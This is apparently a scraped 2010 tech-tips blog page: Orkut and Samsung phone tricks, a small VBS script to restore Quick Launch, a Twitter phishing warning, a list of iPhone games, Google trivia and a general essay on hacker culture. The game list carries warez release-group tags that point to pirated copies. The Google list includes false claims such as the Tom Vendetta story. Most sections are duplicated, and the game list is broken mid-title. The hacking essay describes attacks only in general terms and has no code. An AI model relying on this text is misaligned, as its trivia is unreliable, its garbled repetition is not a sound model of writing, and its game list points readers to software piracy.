Hello Friends,
want to Create Temporary Email ID's which lasts only for
3hrs,6hrs,12hrs or for just 24 hours with
www.meltmail.com
The ID is self destructible.
Monday, 29 March 2010
Orkut Tricks
Hello Friends,
Do you want to Posting blank scrap on Orkut:
*Open any scrapbook.
*Write [i] in d scrapbk.
*Don't write anythng else in the scrapbk & submit the scrap. OK
Do you want to Posting blank scrap on Orkut:
*Open any scrapbook.
*Write [i] in d scrapbk.
*Don't write anythng else in the scrapbk & submit the scrap. OK
HELLO FRIENDS,
Asia's 1st facebook office
starting in india.
Facebook, the popular social networking site,
is going to start an office at Hyderabad.
Asia's 1st facebook office
starting in india.
Facebook, the popular social networking site,
is going to start an office at Hyderabad.
How to Disable/Enable System Restore in Windows Vista
How to Disable/Enable System Restore in Windows Vista:
Start Menu> All Programs> Accessories> System Tools> System Restore
Start Menu> All Programs> Accessories> System Tools> System Restore
Samsung MOBILE SECRETS
Hello Friends, Samsung MOBILE SECRETS:
*#9125#
Activates the smiley when charging
*#9998*228#
Shows Battery status
*#9998*778#
SIM Service Table
*#9125#
Activates the smiley when charging
*#9998*228#
Shows Battery status
*#9998*778#
SIM Service Table
Tuesday, 23 March 2010
Restore / Add Desktop Icon To Quick Launch Area
Hello friends,
If you are deleted the desktop icon from quick launch area and now you want to retrive the desktop icon again
For This you have download a VBS Script and click on it .you will receive a msg "Toolbar Menu's have been restored." click Ok and you are done.
Or paste the below text in notepad
and save as restoreshowdesktop.vbs
Dim myShell
Set myShell = CreateObject("WScript.Shell")
myShell.Run("regsvr32 /n /i:U shell32")
Set myShell = Nothing
MsgBox "Toolbar Menu's have been restored.", 4096,"Finished"
keyboard Shortcuts to show the desktop is "WIN+D"Set myShell = CreateObject("WScript.Shell")
myShell.Run("regsvr32 /n /i:U shell32")
Set myShell = Nothing
MsgBox "Toolbar Menu's have been restored.", 4096,"Finished"
Monday, 22 March 2010
Beware Of The Latest Twitter Phishing Hack
Hello Friends,
We all use twitter as it has evolved as the best micro blogging tool and it’s so easy to use. But one thing we don’t know is that even Twitter accounts have been compromised and hacked and have been a source of more hacking attempts.
Now this is the latest Twitter hack which hacks one account by sending a message like the following:
“this you??”
“LOL is this you”
“hey, i’ve been having better sex and longer with this here”
or any other sex related messages.
These messages are followed by a link that takes us to a malware site that may try to install malware in your system or some of the sites do identity thefts.
So how do I keep away from those phishing scams?
It’s simple. Don’t ever click on the link if you get to the above mentioned messages. Even if you have clicked the link, never ever enter your username or password or any other detail on the displayed page.
Make sure you only give your account access to the most trusted Twitter apps.
OMG!! I have been compromised. What should I do?
If you feel like you have been compromised, you should immediately change or reset your Twitter account password plus you should also change the details that you have given on the scam page. If you use the same password for all the accounts on the internet, you will have to change all the passwords as most probably your password will be used in more malicious attacks on your internet accounts.
Another thing you have to do is reset the Twitter connections. To do it, go to your Twitter account –> Settings –> Connections. Make sure only your most trusted applications remain on this page. Revoke all others.
To be absolutely sure that you’re aware of the latest twitter hacks, keep following Technize as we occasionally write about the hacks that spread more. Additionally you should also start following the Twitter Safety tweets which informs about the latest Twitter threats.
We all use twitter as it has evolved as the best micro blogging tool and it’s so easy to use. But one thing we don’t know is that even Twitter accounts have been compromised and hacked and have been a source of more hacking attempts.
Now this is the latest Twitter hack which hacks one account by sending a message like the following:
“this you??”
“LOL is this you”
“hey, i’ve been having better sex and longer with this here”
or any other sex related messages.
These messages are followed by a link that takes us to a malware site that may try to install malware in your system or some of the sites do identity thefts.
So how do I keep away from those phishing scams?
It’s simple. Don’t ever click on the link if you get to the above mentioned messages. Even if you have clicked the link, never ever enter your username or password or any other detail on the displayed page.
Make sure you only give your account access to the most trusted Twitter apps.
OMG!! I have been compromised. What should I do?
If you feel like you have been compromised, you should immediately change or reset your Twitter account password plus you should also change the details that you have given on the scam page. If you use the same password for all the accounts on the internet, you will have to change all the passwords as most probably your password will be used in more malicious attacks on your internet accounts.
Another thing you have to do is reset the Twitter connections. To do it, go to your Twitter account –> Settings –> Connections. Make sure only your most trusted applications remain on this page. Revoke all others.
To be absolutely sure that you’re aware of the latest twitter hacks, keep following Technize as we occasionally write about the hacks that spread more. Additionally you should also start following the Twitter Safety tweets which informs about the latest Twitter threats.
Games for iPhone
Hello Friends,
Here are some cool and interesting games which are splendid and I’m sure you will enjoy these games because its got many superb games you which can never image !
Touch-iPWNPDA
Baseball.Superstars.v1.3. iPhone.iPod.Touch-iPWNPDA
Crosswords.v1.52.for.iPhone. and.iPod.Touch-FEGPDA
iBearMoney.v2.3.iPhone.iPod. Touch-TCFPDA
iDracula.Undead.Awakening.v1. 1.iPhone.iPod.Touch-iPWNPDA
IMobsters.v1.0.iPhone.iPod. Touch-iPWNPDA
Inspector.Gadget.v1.0.0. iPhone.iPod.Touch-iPWNPDA
iPrentris.v1.1.iPhone.iPod. Touch-iPWNPDA
jfControl.Remote.v1.34.for. iPhone.and.iPod.Touch-FEGPDA
Monster.Trucks.Nitro.v1.0. iPhone.iPod.Touch-iPWNPDA
Platinum.Sudoku.v1.5.7.iPhone. iPod.Touch-iPWNPDA
Rss.Player.v1.20.for.iPhone. and.iPod.Touch-FEGPDA
Sentinel.v1.1.iPhone.iPod. Touch-iPWNPDA
Shredder.Chess.v1.0.iPhone. iPod.Touch-iPWNPDA
StreamItAll.Radio.v2.030.for. iPhone.and.iPod.Touch-FEGPDA
TankPro.v1.26.for.iPhone.and. iPod.Touch-FEGPDA
The.Oregon.Trail.v1.1.2. iPhone.iPod.Touch-iPWNPDA
WWE.Legends.Of.Wrestlemania. v1.0.0.iPhone.iPod.Touch- iPWNPDA
Here are some cool and interesting games which are splendid and I’m sure you will enjoy these games because its got many superb games you which can never image !
Air.Video.v1.10.for.iPhone. and.iPod.Touch-FEGPDA
Alien.Abuse.v1.0.iPhone.iPod.Baseball.Superstars.v1.3.
Crosswords.v1.52.for.iPhone.
iBearMoney.v2.3.iPhone.iPod.
iDracula.Undead.Awakening.v1.
IMobsters.v1.0.iPhone.iPod.
Inspector.Gadget.v1.0.0.
iPrentris.v1.1.iPhone.iPod.
jfControl.Remote.v1.34.for.
Monster.Trucks.Nitro.v1.0.
Platinum.Sudoku.v1.5.7.iPhone.
Rss.Player.v1.20.for.iPhone.
Sentinel.v1.1.iPhone.iPod.
Shredder.Chess.v1.0.iPhone.
StreamItAll.Radio.v2.030.for.
TankPro.v1.26.for.iPhone.and.
The.Oregon.Trail.v1.1.2.
WWE.Legends.Of.Wrestlemania.
All Google Services
Hello Friends,
Well I know a lot of them but when I googled about various services about Google, I found a lot and I thought I should share them with you. So below is the link to all services provided by Google.
Well I know a lot of them but when I googled about various services about Google, I found a lot and I thought I should share them with you. So below is the link to all services provided by Google.
- Google Search
- Google Adwods
- Search Based Keyword Tool
- Custom Search Engine
- Script Convertor
- Google Fast Flip
- Google Fusion Tables
- Google Moderating
- Google Audio Indexing
- 1-800-GOOG-411
- Google Reader
- Google Trends
- Google SMS
- Google Groups
- Google Sets
- GMail
- Google Toolbar
- Google Experimenatl Search
- Webmasters Tool
- In Quotes
- Analytics
- FeedBurner
- Google Chat
- Google Docs
- Google Code
- Blogger
- Google Sites
- Google Wave
- Orkut
- Google Web history
- Google Voice
The Story Behind Google
Hello Friends,
We all use Google in some way or the other. The way Google has evolved is a story worth telling. Here are some of the interesting facts about Google :
1. The name ‘Google’ was an accident. It was the result of a spelling mistake made by the original founders who thought they were going for ‘Googol’. The domain name “Googol.com” was already taken by the time Google was founded.
2. The domain Google.com was registered on 15 September 1997.
3. The first operations of Google was started in this garage
![The Story Behind Google image006 The Story Behind Google]()
![The Story Behind Google The Story Behind Google]()
4. Google (aka Googol) is a mathematical term which means “1 followed by hundred Zeros”. The term ‘Googol’ was coined by Milton Sirotta, nephew of American mathematician Edward Kasne.
5. Google receives daily search requests from all over the world, including Antarctica.
![The Story Behind Google 0,1020,87864,00 The Story Behind Google]()
6. Google’s Homepage has 42 validation errors. Check Google Validation
7. Google’s homepage can be accessed in 88 languages including Urdu and Latin.
8. Every day the Google servers receives about a billion search requests . 20 to 25% of Google queries have never been searched before.
9. The main reason why the Google homepage is so simple is because the founders didn’t knew HTML. The submit button was included much later and hitting the return key was the only way to get the search results.
10. The “I am feeling lucky” button is almost never used by the end user. However it was found that removing the button would reduce the Google experience.
11. In the early days of testing Google employees noted people just sitting and looking at the screen. After a minute the tester asked “What are you waiting for ?”. To this the users replied “We are waiting for the page to load”.
To solve this issue the copyright message was added which acted as an end of the page marker.
12. Google has the largest network of translators in the world.
13. All Google employees are encouraged to use 20% of their time working in their own projects. Google news and Orkut are two big examples that grew from this working model.
14. Google consists of over 450,000 servers, racked up in clusters located in data centers around the world.
15. Google started in January, 1996 as a research project at Stanford University, by Ph.D. candidates Larry Page and Sergey Brin when they were 24 years old and 23 years old respectively.The original google project was named backrub.
16. When Google started it indexed 25,000 web pages. Today Google indexes billions of web pages and each time it grows by 10-25%.
17. According to Google “As the web grows search becomes more and more important”. It acts like a library , the bigger the library the more important is the index.
18. The pagerank algorithm uses more than 200 attributes to determine the rank of a given webpage.
19. Google has the largest corporate solar panel installation in the US.
20. The biggest break in search came when Google introduced their improved spell checker seen as “Did you mean ? ”.This feature doubled their traffic and soon the developers discovered that the ideal placement was at the bottom of the search results.
21. Every now and then Google makes small changes and test them with a given set of users. The users aren’t told of this. They are presented with a new interface and the testers observe how the users react to it.
22. Google believe in 20 % – 5% philosophy. According to this, if at least 20% of the users use a feature then it will be included. To make it to the advanced search preferences, at least 5 % of the users need to use a particular feature.
23. In the results found in user testing and design, Google testers found that only a small number of people are typical of the larger user base. Hence,Google labs was born and it monitors how people use each and every service.
24. Gmail – Free email from Google was used internally for nearly 2 years by Google employees before it was launched for public use. The engineers discovered that there are typically 6 types of email users and Gmail was made to satisfy the needs of them.
25. Google’s index of web pages is the largest in the world, comprising of 8 billion web pages. Google searches this immense collection of web pages often in less than half a second.
26. They listen to feedback actively. Emailing Google isn’t emailing a black hole.
27. Google’s first April fool prank went live on April 1st,2000 and was coined “MentalPlex” – Google’s ability to read your mind.
Some thought the announcement of Gmail in 2004 around April Fool’s Day was a joke.
28. Google Groups comprises of more than 845 million Usenet messages, which is the world’s largest collection of messages or the equivalent of more than a terabyte of human conversation.
29.In a 2006 report of the world’s richest people, Forbes reported that Sergey Brin was #26 with a net worth of $12.9 billion, and Larry Page was #27 with a net worth of $12.8 billion
30. There isn’t any restriction for proper dress code in the Google office. This may include pajamas and even super hero costumes.
31. Tom Vendetta is the youngest google employee ever hired. He was hired by Google when he was 15 years old. Vendetta used to fool his friends by sending fake press releases and news. Vendetta was employed to know the know-how of the teen and to implement them in Gmail security flaws.
32. The first employee that google hired is Craig Silverstein.
33.The first human being named after Google is Oliver google kai. He was born on September 12th 2005 and his parents named him because they wanted Oliver to have as many friends as google has.
We all use Google in some way or the other. The way Google has evolved is a story worth telling. Here are some of the interesting facts about Google :
1. The name ‘Google’ was an accident. It was the result of a spelling mistake made by the original founders who thought they were going for ‘Googol’. The domain name “Googol.com” was already taken by the time Google was founded.
2. The domain Google.com was registered on 15 September 1997.
3. The first operations of Google was started in this garage
4. Google (aka Googol) is a mathematical term which means “1 followed by hundred Zeros”. The term ‘Googol’ was coined by Milton Sirotta, nephew of American mathematician Edward Kasne.
5. Google receives daily search requests from all over the world, including Antarctica.
6. Google’s Homepage has 42 validation errors. Check Google Validation
7. Google’s homepage can be accessed in 88 languages including Urdu and Latin.
8. Every day the Google servers receives about a billion search requests . 20 to 25% of Google queries have never been searched before.
9. The main reason why the Google homepage is so simple is because the founders didn’t knew HTML. The submit button was included much later and hitting the return key was the only way to get the search results.
10. The “I am feeling lucky” button is almost never used by the end user. However it was found that removing the button would reduce the Google experience.
11. In the early days of testing Google employees noted people just sitting and looking at the screen. After a minute the tester asked “What are you waiting for ?”. To this the users replied “We are waiting for the page to load”.
To solve this issue the copyright message was added which acted as an end of the page marker.
12. Google has the largest network of translators in the world.
13. All Google employees are encouraged to use 20% of their time working in their own projects. Google news and Orkut are two big examples that grew from this working model.
14. Google consists of over 450,000 servers, racked up in clusters located in data centers around the world.
15. Google started in January, 1996 as a research project at Stanford University, by Ph.D. candidates Larry Page and Sergey Brin when they were 24 years old and 23 years old respectively.The original google project was named backrub.
16. When Google started it indexed 25,000 web pages. Today Google indexes billions of web pages and each time it grows by 10-25%.
17. According to Google “As the web grows search becomes more and more important”. It acts like a library , the bigger the library the more important is the index.
18. The pagerank algorithm uses more than 200 attributes to determine the rank of a given webpage.
19. Google has the largest corporate solar panel installation in the US.
20. The biggest break in search came when Google introduced their improved spell checker seen as “Did you mean ? ”.This feature doubled their traffic and soon the developers discovered that the ideal placement was at the bottom of the search results.
21. Every now and then Google makes small changes and test them with a given set of users. The users aren’t told of this. They are presented with a new interface and the testers observe how the users react to it.
22. Google believe in 20 % – 5% philosophy. According to this, if at least 20% of the users use a feature then it will be included. To make it to the advanced search preferences, at least 5 % of the users need to use a particular feature.
23. In the results found in user testing and design, Google testers found that only a small number of people are typical of the larger user base. Hence,Google labs was born and it monitors how people use each and every service.
24. Gmail – Free email from Google was used internally for nearly 2 years by Google employees before it was launched for public use. The engineers discovered that there are typically 6 types of email users and Gmail was made to satisfy the needs of them.
25. Google’s index of web pages is the largest in the world, comprising of 8 billion web pages. Google searches this immense collection of web pages often in less than half a second.
26. They listen to feedback actively. Emailing Google isn’t emailing a black hole.
27. Google’s first April fool prank went live on April 1st,2000 and was coined “MentalPlex” – Google’s ability to read your mind.
Some thought the announcement of Gmail in 2004 around April Fool’s Day was a joke.
28. Google Groups comprises of more than 845 million Usenet messages, which is the world’s largest collection of messages or the equivalent of more than a terabyte of human conversation.
29.In a 2006 report of the world’s richest people, Forbes reported that Sergey Brin was #26 with a net worth of $12.9 billion, and Larry Page was #27 with a net worth of $12.8 billion
30. There isn’t any restriction for proper dress code in the Google office. This may include pajamas and even super hero costumes.
31. Tom Vendetta is the youngest google employee ever hired. He was hired by Google when he was 15 years old. Vendetta used to fool his friends by sending fake press releases and news. Vendetta was employed to know the know-how of the teen and to implement them in Gmail security flaws.
32. The first employee that google hired is Craig Silverstein.
How Hackers Work?||How To Hack
Hello Friends,
Thanks to the media, the word “hacker” has gotten a bad reputation. The word summons up thoughts of malicious computer users finding new ways to harass people, defraud corporations, steal information and maybe even destroy the economy or start a war by infiltrating military computer systems. While there’s no denying that there are hackers out there with bad intentions, they make up only a small percentage of the hacker community.
The term computer hacker first showed up in the mid-1960s. A hacker was a programmer — someone who hacked out computer code. Hackers were visionaries who could see new ways to use computers, creating programs that no one else could conceive. They were the pioneers of the computer industry, building everything from small applications to operating systems. In this sense, people like Bill Gates, Steve Jobs and Steve Wozniak were all hackers — they saw the potential of what computers could do and created ways to achieve that potential.
A unifying trait among these hackers was a strong sense of curiosity, sometimes bordering on obsession. These hackers prided themselves on not only their ability to create new programs, but also to learn how other programs and systems worked. When a program had a bug — a section of bad code that prevented the program from working properly — hackers would often create and distribute small sections of code called patches to fix the problem. Some managed to land a job that leveraged their skills, getting paid for what they’d happily do for free.
As computers evolved, computer engineers began to network individual machines together into a system. Soon, the term hacker had a new meaning — a person using computers to explore a network to which he or she didn’t belong. Usually hackers didn’t have any malicious intent. They just wanted to know how computer networks worked and saw any barrier between them and that knowledge as a challenge.
In fact, that’s still the case today. While there are plenty of stories about malicious hackers sabotaging computer systems, infiltrating networks and spreading computer viruses, most hackers are just curious — they want to know all the intricacies of the computer world. Some use their knowledge to help corporations and governments construct better security measures. Others might use their skills for more unethical endeavors.
In this article, we’ll explore common techniques hackers use to infiltrate systems. We’ll examine hacker culture and the various kinds of hackers as well as learn about famous hackers, some of whom have run afoul of the law.
The Hacker Toolbox
The main resource hackers rely upon, apart from their own ingenuity, is computer code. While there is a large community of hackers on the Internet, only a relatively small number of hackers actually program code. Many hackers seek out and download code written by other people. There are thousands of different programs hackers use to explore computers and networks. These programs give hackers a lot of power over innocent users and organizations — once a skilled hacker knows how a system works, he can design programs that exploit it.
Malicious hackers use programs to:
Log keystrokes: Some programs allow hackers to review every keystroke a computer user makes. Once installed on a victim’s computer, the programs record each keystroke, giving the hacker everything he needs to infiltrate a system or even steal someone’s identity.
Hack passwords: There are many ways to hack someone’s password, from educated guesses to simple algorithms that generate combinations of letters, numbers and symbols. The trial and error method of hacking passwords is called a brute force attack, meaning the hacker tries to generate every possible combination to gain access. Another way to hack passwords is to use a dictionary attack, a program that inserts common words into password fields.
Infect a computer or system with a virus: Computer viruses are programs designed to duplicate themselves and cause problems ranging from crashing a computer to wiping out everything on a system’s hard drive. A hacker might install a virus by infiltrating a system, but it’s much more common for hackers to create simple viruses and send them out to potential victims via email, instant messages, Web sites with downloadable content or peer-to-peer networks.
Gain backdoor access: Similar to hacking passwords, some hackers create programs that search for unprotected pathways into network systems and computers. In the early days of the Internet, many computer systems had limited security, making it possible for a hacker to find a pathway into the system without a username or password. Another way a hacker might gain backdoor access is to infect a computer or system with a Trojan horse.
Create zombie computers: A zombie computer, or bot, is a computer that a hacker can use to send spam or commit Distributed Denial of Service (DDoS) attacks. After a victim executes seemingly innocent code, a connection opens between his computer and the hacker’s system. The hacker can secretly control the victim’s computer, using it to commit crimes or spread spam.
Spy on e-mail: Hackers have created code that lets them intercept and read e-mail messages — the Internet’s equivalent to wiretapping. Today, most e-mail programs use encryption formulas so complex that even if a hacker intercepts the message, he won’t be able to read it.
Hacker Culture
Individually, many hackers are antisocial. Their intense interest in computers and programming can become a communication barrier. Left to his or her own devices, a hacker can spend hours working on a computer program while neglecting everything else.
Computer networks gave hackers a way to associate with other people with their same interests. Before the Internet became easily accessible, hackers would set up and visit bulletin board systems (BBS). A hacker could host a bulletin board system on his or her computer and let people dial into the system to send messages, share information, play games and download programs. As hackers found one another, information exchanges increased dramatically.
Some hackers posted their accomplishments on a BBS, boasting about infiltrating secure systems. Often they would upload a document from their victims’ databases to prove their claims. By the early 1990s, law enforcement officials considered hackers an enormous security threat. There seemed to be hundreds of people who could hack into the world’s most secure systems at will [source: Sterling].
There are many Web sites dedicated to hacking. The hacker journal “2600: The Hacker Quarterly” has its own site, complete with a live broadcast section dedicated to hacker topics. The print version is still available on newsstands. Web sites like Hacker.org promote learning and include puzzles and competitions for hackers to test their skills.
When caught — either by law enforcement or corporations — some hackers admit that they could have caused massive problems. Most hackers don’t want to cause trouble; instead, they hack into systems just because they wanted to know how the systems work. To a hacker, a secure system is like Mt. Everest — he or she infiltrates it for the sheer challenge. In the United States, a hacker can get into trouble for just entering a system. The Computer Fraud and Abuse Act outlaws unauthorized access to computer systems [source: Hacking Laws].
Hackers and Crackers
Many computer programmers insist that the word “hacker” applies only to law-abiding enthusiasts who help create programs and applications or improve computer security. Anyone using his or her skills maliciously isn’t a hacker at all, but a cracker.
Crackers infiltrate systems and cause mischief, or worse. Unfortunately, most people outside the hacker community use the word as a negative term because they don’t understand the distinction between hackers and crackers.
Not all hackers try to explore forbidden computer systems. Some use their talents and knowledge to create better software and security measures. In fact, many hackers who once used their skills to break into systems now put that knowledge and ingenuity to use by creating more comprehensive security measures. In a way, the Internet is a battleground between different kinds of hackers — the bad guys, or black hats, who try to infiltrate systems or spread viruses, and the good guys, or white hats, who bolster security systems and develop powerful virus protection software.
Hackers on both sides overwhelmingly support open source software, programs in which the source code is available for anyone to study, copy, distribute and modify. With open source software, hackers can learn from other hackers’ experiences and help make programs work better than they did before. Programs might range from simple applications to complex operating systems like Linux.
There are several annual hacker events, most of which promote responsible behavior. A yearly convention in Las Vegas called DEFCON sees thousands of attendees gather to exchange programs, compete in contests, participate in panel discussions about hacking and computer development and generally promote the pursuit of satisfying curiosity. A similar event called the Chaos Communication Camp combines low-tech living arrangements — most attendees stay in tents — and high-tech conversation and activities.
In the next section, we’ll learn about hackers and legal issues.
Hackers and the Law
In general, most governments aren’t too crazy about hackers. Hackers’ ability to slip in and out of computers undetected, stealing classified information when it amuses them, is enough to give a government official a nightmare. Secret information, or intelligence, is incredibly important. Many government agents won’t take the time to differentiate between a curious hacker who wants to test his skills on an advanced security system and a spy.
Laws reflect this attitude. In the United States, there are several laws forbidding the practice of hacking. Some, like 18 U.S.C. § 1029, concentrate on the creation, distribution and use of codes and devices that give hackers unauthorized access to computer systems. The language of the law only specifies using or creating such a device with the intent to defraud, so an accused hacker could argue he just used the devices to learn how security systems worked.
Another important law is 18 U.S.C. § 1030, part of which forbids unauthorized access to government computers. Even if a hacker just wants to get into the system, he or she could be breaking the law and be punished for accessing a nonpublic government computer [Source: U.S. Department of Justice].
Punishments range from hefty fines to jail time. Minor offenses may earn a hacker as little as six months’ probation, while other offenses can result in a maximum sentence of 20 years in jail. One formula on the Department of Justice’s Web page factors in the financial damage a hacker causes, added to the number of his victims to determine an appropriate punishment [Source: U.S. Department of Justice].
Hacking a Living
Hackers who obey the law can make a good living. Several companies hire hackers to test their security systems for flaws. Hackers can also make their fortunes by creating useful programs and applications, like Stanford University students Larry Page and Sergey Brin. Page and Brin worked together to create a search engine they eventually named Google. Today, they are tied for 26th place on Forbes’ list of the world’s most wealthy billionaires [source: Forbes].
Other countries have similar laws, some much more vague than legislation in the U.S. A recent German law forbids possession of “hacker tools.” Critics say that the law is too broad and that many legitimate applications fall under its vague definition of hacker tools. Some point out that under this legislation, companies would be breaking the law if they hired hackers to look for flaws in their security systems [source: IDG News Service].
Hackers can commit crimes in one country while sitting comfortably in front of their computers on the other side of the world. Therefore, prosecuting a hacker is a complicated process. Law enforcement officials have to petition countries to extradite suspects in order to hold a trial, and this process can take years. One famous case is the United States’ indictment of hacker Gary McKinnon. Since 2002, McKinnon fought extradition charges to the U.S. for hacking into the Department of Defense and NASA computer systems. McKinnon, who hacked from the United Kingdom, defended himself by claiming that he merely pointed out flaws in important security systems. In April 2007, his battle against extradition came to an end when the British courts denied his appeal [Source: BBC News].
In the next section, we’ll look at some famous and notorious hackers.
Famous Hackers
Steve Jobs and Steve Wozniak, founders of Apple Computers, are both hackers. Some of their early exploits even resemble the questionable activities of some malicious hackers. However, both Jobs and Wozniak outgrew their malicious behavior and began concentrating on creating computer hardware and software. Their efforts helped usher in the age of the personal computer — before Apple, computer systems remained the property of large corporations, too expensive and cumbersome for average consumers.
Linus Torvalds, creator of Linux, is another famous honest hacker. His open source operating system is very popular with other hackers. He has helped promote the concept of open source software, showing that when you open information up to everyone, you can reap amazing benefits.
Richard Stallman, also known as “rms,” founded the GNU Project, a free operating system. He promotes the concept of free software and computer access. He works with organizations like the Free Software Foundation and opposes policies like Digital Rights Management.
On the other end of the spectrum are the black hats of the hacking world. At the age of 16, Jonathan James became the first juvenile hacker to get sent to prison. He committed computer intrusions on some very high-profile victims, including NASA and a Defense Threat Reduction Agency server. Online, Jonathan used the nickname (called a handle) “c0mrade.” Originally sentenced to house arrest, James was sent to prison when he violated parole.
Greg Finley/Getty Images
Hacker Kevin Mitnick, newly released from the Federal Correctional Institution in Lompoc, California.
Kevin Mitnick gained notoriety in the 1980s as a hacker who allegedly broke into the North American Aerospace Defense Command (NORAD) when he was 17 years old. Mitnick’s reputation seemed to grow with every retelling of his exploits, eventually leading to the rumor that Mitnick had made the FBI’s Most Wanted list. In reality, Mitnick was arrested several times for hacking into secure systems, usually to gain access to powerful computer software.
Kevin Poulsen, or Dark Dante, specialized in hacking phone systems. He’s famous for hacking the phones of a radio station called KIIS-FM. Poulsen’s hack allowed only calls originating from his house to make it through to the station, allowing him to win in various radio contests. Since then, he has turned over a new leaf, and now he’s famous for being a senior editor at Wired magazine.
Adrian Lamo hacked into computer systems using computers at libraries and Internet cafes. He would explore high-profile systems for security flaws, exploit the flaws to hack into the system, and then send a message to the corresponding company, letting them know about the security flaw. Unfortunately for Lamo, he was doing this on his own time rather than as a paid consultant — his activities were illegal. He also snooped around a lot, reading sensitive information and giving himself access to confidential material. He was caught after breaking into the computer system belonging to the New York Times.
It’s likely that there are thousands of hackers active online today, but an accurate count is impossible. Many hackers don’t really know what they are doing — they’re just using dangerous tools they don’t completely understand. Others know what they’re doing so well that they can slip in and out of systems without anyone ever knowing.
The term computer hacker first showed up in the mid-1960s. A hacker was a programmer — someone who hacked out computer code. Hackers were visionaries who could see new ways to use computers, creating programs that no one else could conceive. They were the pioneers of the computer industry, building everything from small applications to operating systems. In this sense, people like Bill Gates, Steve Jobs and Steve Wozniak were all hackers — they saw the potential of what computers could do and created ways to achieve that potential.
A unifying trait among these hackers was a strong sense of curiosity, sometimes bordering on obsession. These hackers prided themselves on not only their ability to create new programs, but also to learn how other programs and systems worked. When a program had a bug — a section of bad code that prevented the program from working properly — hackers would often create and distribute small sections of code called patches to fix the problem. Some managed to land a job that leveraged their skills, getting paid for what they’d happily do for free.
As computers evolved, computer engineers began to network individual machines together into a system. Soon, the term hacker had a new meaning — a person using computers to explore a network to which he or she didn’t belong. Usually hackers didn’t have any malicious intent. They just wanted to know how computer networks worked and saw any barrier between them and that knowledge as a challenge.
In fact, that’s still the case today. While there are plenty of stories about malicious hackers sabotaging computer systems, infiltrating networks and spreading computer viruses, most hackers are just curious — they want to know all the intricacies of the computer world. Some use their knowledge to help corporations and governments construct better security measures. Others might use their skills for more unethical endeavors.
In this article, we’ll explore common techniques hackers use to infiltrate systems. We’ll examine hacker culture and the various kinds of hackers as well as learn about famous hackers, some of whom have run afoul of the law.
The Hacker Toolbox
The main resource hackers rely upon, apart from their own ingenuity, is computer code. While there is a large community of hackers on the Internet, only a relatively small number of hackers actually program code. Many hackers seek out and download code written by other people. There are thousands of different programs hackers use to explore computers and networks. These programs give hackers a lot of power over innocent users and organizations — once a skilled hacker knows how a system works, he can design programs that exploit it.
Malicious hackers use programs to:
Log keystrokes: Some programs allow hackers to review every keystroke a computer user makes. Once installed on a victim’s computer, the programs record each keystroke, giving the hacker everything he needs to infiltrate a system or even steal someone’s identity.
Hack passwords: There are many ways to hack someone’s password, from educated guesses to simple algorithms that generate combinations of letters, numbers and symbols. The trial and error method of hacking passwords is called a brute force attack, meaning the hacker tries to generate every possible combination to gain access. Another way to hack passwords is to use a dictionary attack, a program that inserts common words into password fields.
Infect a computer or system with a virus: Computer viruses are programs designed to duplicate themselves and cause problems ranging from crashing a computer to wiping out everything on a system’s hard drive. A hacker might install a virus by infiltrating a system, but it’s much more common for hackers to create simple viruses and send them out to potential victims via email, instant messages, Web sites with downloadable content or peer-to-peer networks.
Gain backdoor access: Similar to hacking passwords, some hackers create programs that search for unprotected pathways into network systems and computers. In the early days of the Internet, many computer systems had limited security, making it possible for a hacker to find a pathway into the system without a username or password. Another way a hacker might gain backdoor access is to infect a computer or system with a Trojan horse.
Create zombie computers: A zombie computer, or bot, is a computer that a hacker can use to send spam or commit Distributed Denial of Service (DDoS) attacks. After a victim executes seemingly innocent code, a connection opens between his computer and the hacker’s system. The hacker can secretly control the victim’s computer, using it to commit crimes or spread spam.
Spy on e-mail: Hackers have created code that lets them intercept and read e-mail messages — the Internet’s equivalent to wiretapping. Today, most e-mail programs use encryption formulas so complex that even if a hacker intercepts the message, he won’t be able to read it.
Hacker Culture
Individually, many hackers are antisocial. Their intense interest in computers and programming can become a communication barrier. Left to his or her own devices, a hacker can spend hours working on a computer program while neglecting everything else.
Computer networks gave hackers a way to associate with other people with their same interests. Before the Internet became easily accessible, hackers would set up and visit bulletin board systems (BBS). A hacker could host a bulletin board system on his or her computer and let people dial into the system to send messages, share information, play games and download programs. As hackers found one another, information exchanges increased dramatically.
Some hackers posted their accomplishments on a BBS, boasting about infiltrating secure systems. Often they would upload a document from their victims’ databases to prove their claims. By the early 1990s, law enforcement officials considered hackers an enormous security threat. There seemed to be hundreds of people who could hack into the world’s most secure systems at will [source: Sterling].
There are many Web sites dedicated to hacking. The hacker journal “2600: The Hacker Quarterly” has its own site, complete with a live broadcast section dedicated to hacker topics. The print version is still available on newsstands. Web sites like Hacker.org promote learning and include puzzles and competitions for hackers to test their skills.
When caught — either by law enforcement or corporations — some hackers admit that they could have caused massive problems. Most hackers don’t want to cause trouble; instead, they hack into systems just because they wanted to know how the systems work. To a hacker, a secure system is like Mt. Everest — he or she infiltrates it for the sheer challenge. In the United States, a hacker can get into trouble for just entering a system. The Computer Fraud and Abuse Act outlaws unauthorized access to computer systems [source: Hacking Laws].
Hackers and Crackers
Many computer programmers insist that the word “hacker” applies only to law-abiding enthusiasts who help create programs and applications or improve computer security. Anyone using his or her skills maliciously isn’t a hacker at all, but a cracker.
Crackers infiltrate systems and cause mischief, or worse. Unfortunately, most people outside the hacker community use the word as a negative term because they don’t understand the distinction between hackers and crackers.
Not all hackers try to explore forbidden computer systems. Some use their talents and knowledge to create better software and security measures. In fact, many hackers who once used their skills to break into systems now put that knowledge and ingenuity to use by creating more comprehensive security measures. In a way, the Internet is a battleground between different kinds of hackers — the bad guys, or black hats, who try to infiltrate systems or spread viruses, and the good guys, or white hats, who bolster security systems and develop powerful virus protection software.
Hackers on both sides overwhelmingly support open source software, programs in which the source code is available for anyone to study, copy, distribute and modify. With open source software, hackers can learn from other hackers’ experiences and help make programs work better than they did before. Programs might range from simple applications to complex operating systems like Linux.
There are several annual hacker events, most of which promote responsible behavior. A yearly convention in Las Vegas called DEFCON sees thousands of attendees gather to exchange programs, compete in contests, participate in panel discussions about hacking and computer development and generally promote the pursuit of satisfying curiosity. A similar event called the Chaos Communication Camp combines low-tech living arrangements — most attendees stay in tents — and high-tech conversation and activities.
In the next section, we’ll learn about hackers and legal issues.
Hackers and the Law
In general, most governments aren’t too crazy about hackers. Hackers’ ability to slip in and out of computers undetected, stealing classified information when it amuses them, is enough to give a government official a nightmare. Secret information, or intelligence, is incredibly important. Many government agents won’t take the time to differentiate between a curious hacker who wants to test his skills on an advanced security system and a spy.
